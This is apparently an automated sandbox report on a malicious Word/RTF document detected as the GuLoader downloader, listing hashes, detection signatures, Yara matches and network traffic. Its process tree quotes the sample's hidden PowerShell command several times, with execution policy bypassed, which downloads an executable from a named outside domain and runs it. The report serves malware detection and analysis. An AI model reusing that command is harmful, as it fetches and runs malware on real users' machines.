Windows Analysis Report
TEPO0015922.doc

Overview

General Information

Sample Name:TEPO0015922.doc
Analysis ID:829399
MD5:364dc6c0e8a18b796aa535516d04cb53
SHA1:da1e74c37691d9fd57eb2e73ef89b3aacbaa23d2
SHA256:dd6f2ad2370d52c77db8f3659c116f15c1897e2528694fe9f046be45928a2608
Tags:doc
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (creates forbidden files)
Yara detected GuLoader
Microsoft Office creates scripting files
Office process drops PE file
Injects files into Windows application
Document contains OLE streams with names of living off the land binaries
Bypasses PowerShell execution policy
Tries to download and execute files (via powershell)
Suspicious powershell command line found
Powershell drops PE file
Tries to detect virtualization through RDTSC time measurements
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
PE file contains more sections than normal
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 1404 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • cmd.exe (PID: 1204 cmdline: "C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe') MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 264 cmdline: PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 1820 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • file.exe (PID: 2460 cmdline: C:\Users\user\AppData\Roaming\file.exe MD5: A1AFEF77EEC567ADB1076E8679AF207B)
    • cmd.exe (PID: 2840 cmdline: "C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe') MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 1568 cmdline: PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 2668 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • file.exe (PID: 1452 cmdline: C:\Users\user\AppData\Roaming\file.exe MD5: A1AFEF77EEC567ADB1076E8679AF207B)
    • cmd.exe (PID: 1320 cmdline: "C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe') MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 1832 cmdline: PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 1668 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • file.exe (PID: 2708 cmdline: C:\Users\user\AppData\Roaming\file.exe MD5: A1AFEF77EEC567ADB1076E8679AF207B)
    • verclsid.exe (PID: 1808 cmdline: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5 MD5: 3796AE13F680D9239210513EDA590E86)
    • notepad.exe (PID: 280 cmdline: C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scT MD5: B32189BDFF6E577A92BAA61AD49264E6)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source | Rule | Description | Author | Strings
TEPO0015922.doc | SUSP_INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embedding one of the object mostly observed in exploit (e.g. CVE-2017-11882) documents. | ditekSHen
  • 0xb9e:$obj2: \objdata
  • 0xeb0c:$obj2: \objdata
  • 0xeaf8:$obj3: \objupdate
  • 0xea73:$obj4: \objemb
  • 0x10077:$obj4: \objemb
  • 0xea62:$obj6: \objlink
TEPO0015922.doc | INDICATOR_RTF_Exploit_Scripting | detects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents. | ditekSHen
  • 0xf3f9:$clsid2: 0003000000000000C000000000000046
  • 0xeb57:$ole6: D0Cf11E
  • 0xb9e:$obj2: \objdata
  • 0xeb0c:$obj2: \objdata
  • 0xeaf8:$obj3: \objupdate
  • 0xea73:$obj4: \objemb
  • 0x10077:$obj4: \objemb
  • 0xea62:$obj6: \objlink
  • 0xcad:$sct1: 33 43 37 33 36 33 37 32 36 39 37 30 37 34 36 43 36 35 35 34
TEPO0015922.doc | INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embedding one of the object mostly observed in exploit documents. | ditekSHen
  • 0xb9e:$obj2: \objdata
  • 0xeb0c:$obj2: \objdata
  • 0xeaf8:$obj3: \objupdate
  • 0xea73:$obj4: \objemb
  • 0x10077:$obj4: \objemb
  • 0xea62:$obj6: \objlink
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\file.exe | SUSP_NullSoftInst_Combo_Oct20_1 | Detects suspicious NullSoft Installer combination with common Copyright strings | Florian Roth (Nextron Systems)
  • 0x18c08:$a1: NullsoftInst
  • 0x183d0:$b1: Microsoft Corporation
  • 0x1841c:$b1: Microsoft Corporation
  • 0x18500:$b1: Microsoft Corporation
  • 0x18584:$b1: Microsoft Corporation
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file[1].exe | SUSP_NullSoftInst_Combo_Oct20_1 | Detects suspicious NullSoft Installer combination with common Copyright strings | Florian Roth (Nextron Systems)
  • 0x18c08:$a1: NullsoftInst
  • 0x183d0:$b1: Microsoft Corporation
  • 0x1841c:$b1: Microsoft Corporation
  • 0x18500:$b1: Microsoft Corporation
  • 0x18584:$b1: Microsoft Corporation
Source | Rule | Description | Author | Strings
0000000C.00000002.925602681.000000000016E000.00000004.00000020.00020000.00000000.sdmp | Suspicious_PowerShell_WebDownload_1 | Detects suspicious PowerShell code that downloads from web sites | Florian Roth (Nextron Systems)
  • 0xa9fc:$s3: System.Net.WebClient).DownloadFile('httP
0000000C.00000002.925602681.000000000016E000.00000004.00000020.00020000.00000000.sdmp | PowerShell_Susp_Parameter_Combo | Detects PowerShell invocation with suspicious parameters | Florian Roth (Nextron Systems)
  • 0xa9bb:$sb1: -W Hidden
  • 0xa9ab:$sc1: -NoP
  • 0xa9b5:$sd1: -NonI
  • 0xa9c5:$se3: -ExecutionPolicy bypass
  • 0xa9b0:$sf1: -sta
00000006.00000002.912243758.0000000001CF6000.00000004.00000020.00020000.00000000.sdmp | Suspicious_PowerShell_WebDownload_1 | Detects suspicious PowerShell code that downloads from web sites | Florian Roth (Nextron Systems)
  • 0x91a:$s3: System.Net.WebClient).DownloadFile('httP
00000006.00000002.911999906.0000000000200000.00000004.00000020.00020000.00000000.sdmp | Suspicious_PowerShell_WebDownload_1 | Detects suspicious PowerShell code that downloads from web sites | Florian Roth (Nextron Systems)
  • 0x329c:$s3: System.Net.WebClient).DownloadFile('httP
00000006.00000002.911999906.0000000000200000.00000004.00000020.00020000.00000000.sdmp | PowerShell_Susp_Parameter_Combo | Detects PowerShell invocation with suspicious parameters | Florian Roth (Nextron Systems)
  • 0x26d0:$sb1: -W Hidden
  • 0x2880:$sb1: -W Hidden
  • 0x325b:$sb1: -W Hidden
  • 0x26b0:$sc1: -NoP
  • 0x2860:$sc1: -NoP
  • 0x324b:$sc1: -NoP
  • 0x26c4:$sd1: -NonI
  • 0x2874:$sd1: -NonI
  • 0x3255:$sd1: -NonI
  • 0x26e4:$se3: -ExecutionPolicy bypass
  • 0x2894:$se3: -ExecutionPolicy bypass
  • 0x3265:$se3: -ExecutionPolicy bypass
  • 0x26ba:$sf1: -sta
  • 0x286a:$sf1: -sta
  • 0x3250:$sf1: -sta
No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: TEPO0015922.doc | ReversingLabs: Detection: 23%
Source: TEPO0015922.doc | Virustotal: Detection: 42%
Source: unknown | HTTPS traffic detected: 149.102.154.62:443 -> 192.168.2.22:49172 version: TLS 1.0
Source: C:\Users\user\AppData\Roaming\file.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Busafgange\Mekanismens\License.rtf
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown | HTTPS traffic detected: 149.102.154.62:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: Binary string: tomation.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.pdb1. source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb=C:\ source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbamDa source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb8t source: powershell.exe, 00000012.00000002.958909440.0000000002D54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbstem.M source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb:\Pr source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B54000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\file.exe | Code function: 9_2_00405A19 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,9_2_00405A19
Source: C:\Users\user\AppData\Roaming\file.exe | Code function: 9_2_004065CE FindFirstFileA,FindClose,9_2_004065CE
Source: C:\Users\user\AppData\Roaming\file.exe | Code function: 9_2_004027AA FindFirstFileA,9_2_004027AA
Source: C:\Users\user\AppData\Roaming\file.exe | Code function: 16_2_00405A19 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,16_2_00405A19
Source: C:\Users\user\AppData\Roaming\file.exe | Code function: 16_2_004065CE FindFirstFileA,FindClose,16_2_004065CE
Source: C:\Users\user\AppData\Roaming\file.exe | Code function: 16_2_004027AA FindFirstFileA,16_2_004027AA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: file[1].exe.0.dr
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scT
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file[1].exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\cmd.exe
Source: global traffic | DNS query: name: thekaribacruisecompany.com
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global traffic | TCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
